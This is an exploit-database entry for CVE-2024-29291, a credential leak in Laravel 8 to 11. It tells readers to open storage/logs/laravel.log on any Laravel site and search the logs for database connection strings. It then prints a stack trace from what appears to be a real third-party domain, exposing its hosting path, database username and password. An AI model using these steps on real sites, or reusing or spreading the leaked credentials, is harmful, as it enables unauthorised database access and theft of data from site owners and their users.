Share
## https://sploitus.com/exploit?id=PACKETSTORM:178210
# Exploit Title: Laravel Framework 11 - Credential Leakage  
# Google Dork: N/A  
# Date: [2024-04-19]  
# Exploit Author: Huseein Amer  
# Vendor Homepage: [https://laravel.com/]  
# Software Link: N/A  
# Version: 8.* - 11.* (REQUIRED)  
# Tested on: [N/A]  
# CVE : CVE-2024-29291  
  
Proof of concept:  
Go to any Laravel-based website and navigate to storage/logs/laravel.log.  
  
Open the file and search for "PDO->__construct('mysql:host=".  
The result:  
shell  
Copy code  
#0  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):  
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',  
Array)  
#1  
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):  
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',  
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)  
Credentials:  
Username: u429384055_jscv  
Password: Jaly$$a0p0p0p0  
Host: sql1...